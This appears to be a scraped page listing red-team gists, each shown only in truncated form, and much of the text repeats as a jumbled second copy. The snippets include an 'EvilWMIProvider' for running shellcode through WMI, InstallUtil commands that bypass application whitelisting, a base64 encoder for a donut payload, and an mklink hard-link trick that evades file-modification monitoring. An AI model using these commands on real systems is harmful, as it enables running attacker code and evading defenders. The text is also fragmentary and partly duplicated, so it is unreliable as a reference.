TheWover

## SystemProcessIdInformation.cpp
// Demonstrates use of NtQuerySystemInformation and SystemProcessIdInformation to get the image name of a process without opening a process handle
// Author: TheWover
//

#include <iostream>
#include <string>
#include "ntdefs.h"

typedef struct SYSTEM_PROCESS_ID_INFORMATION
{

## SystemProcessInformation.cpp
// Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
// Author: TheWover
//

#include <iostream>
#include <string>
#include "ntdefs.h"

bool demoSystemProcessInformation(bool full)
{

## EtwpTest.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace EtwpTest
{
    class Program
    {
        static void Main(string[] args)
        {

## process_list_without_handles.cpp
/*
*
* List process information on windows without opening any handles, including process architecture and username
*
*/

#include <Windows.h>
#include <stdio.h>
#include <math.h>

## win32_hook.h
/*
 * EAT-based hooking for x86/x64.
 *
 * Big thanks to ez (https://github.com/ezdiy/) for making this!
 *
 * Creates "hooks" by modifying the module's export address table.
 * The procedure works in three main parts:
 *
 * 1. Reading the module's PE file and getting all exported functions.
 * 2. Finding the right function to "hook" by simple address lookup

## EvilWMIProvider.cs
// Based On LocalAdmin WMI Provider by Roger Zander
// http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx
// Adapted For Evil By @subTee
// Executes x64 ShellCode
//
// Deliver and Install dll
// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll
// Invoke calc for SYSTEM level calculations
// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode
// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null

## dllmain.cpp
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
#include <string>

std::string test = "not Loaded";

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )

## Base64EncodeFile.ps1
$filename = "C:\\Testing\donut\\payload.bin"
[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip

## Update_Notes.md

      
              3 files
            
          
              3 forks
            
          
              0 comments
            
          
              2 stars
            
          
                TheWover
                / Update_Notes.md
            
            
              Created
              August 5, 2019 13:14
            
              
                 Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
              
          
    Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.
xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

  
## mimic.cs
using System;
using System.Management;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe mimic.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U mimic.exe
	// Demonstrates use of NtQuerySystemInformation and SystemProcessIdInformation to get the image name of a process without opening a process handle
	// Author: TheWover
	//

	#include <iostream>
	#include <string>
	#include "ntdefs.h"

	typedef struct SYSTEM_PROCESS_ID_INFORMATION
	{
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;

	namespace EtwpTest
	{
	class Program
	{
	static void Main(string[] args)
	{
	/*
	*
	* List process information on windows without opening any handles, including process architecture and username
	*
	*/

	#include <Windows.h>
	#include <stdio.h>
	#include <math.h>
	/*
	* EAT-based hooking for x86/x64.
	*
	* Big thanks to ez (https://github.com/ezdiy/) for making this!
	*
	* Creates "hooks" by modifying the module's export address table.
	* The procedure works in three main parts:
	*
	* 1. Reading the module's PE file and getting all exported functions.
	* 2. Finding the right function to "hook" by simple address lookup
	// Based On LocalAdmin WMI Provider by Roger Zander
	// http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx
	// Adapted For Evil By @subTee
	// Executes x64 ShellCode
	//
	// Deliver and Install dll
	// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll
	// Invoke calc for SYSTEM level calculations
	// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode
	// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null
	// dllmain.cpp : Defines the entry point for the DLL application.
	#include "stdafx.h"
	#include <string>

	std::string test = "not Loaded";

	BOOL APIENTRY DllMain( HMODULE hModule,
	DWORD ul_reason_for_call,
	LPVOID lpReserved
	)
	$filename = "C:\\Testing\donut\\payload.bin"
	[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) \| clip
	using System;
	using System.Management;

	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause
	Step One:
	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe mimic.cs
	Step Two:
	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U mimic.exe